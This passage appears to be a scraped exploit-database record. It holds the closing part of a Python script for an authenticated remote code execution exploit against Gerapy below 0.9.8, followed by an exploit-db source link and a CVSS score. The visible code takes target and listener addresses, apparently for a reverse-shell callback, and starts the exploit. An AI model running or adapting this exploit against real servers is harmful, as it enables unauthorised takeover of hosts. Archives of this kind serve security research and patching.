argparse.ArgumentParser(description='Gerapy < 0.9.8 - Remote Code Execution (RCE) (Authenticated)')\r\n\tparser.add_argument('-t', '--target', dest=\"url\", required=True, action='store', help='Target IP')\r\n\tparser.add_argument('-p', '--port', dest=\"target_port\", required=True, action='store', help='Target port')\r\n\tparser.add_argument('-L', '--lh', dest=\"localhost\", required=True, action='store', help='Listening IP')\r\n\tparser.add_argument('-P', '--lp', dest=\"localport\", required=True, action='store', help='Listening port')\r\n\targs = parser.parse_args()\r\n\treturn args\r\n\r\nargs = get_args()\r\ntarget_ip = args.url\r\ntarget_port = args.target_port\r\nlocalhost = args.localhost\r\nlocalport = args.localport\r\n\r\nexp = Exploit(target_ip, target_port, localhost, localport)\r\nexp.exploitation()", "sourceHref": "https://www.exploit-db.com/download/50640", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}

Gerapy 0.9.7 - Remote Code Execution (Authenticated) Exploit

Description

Related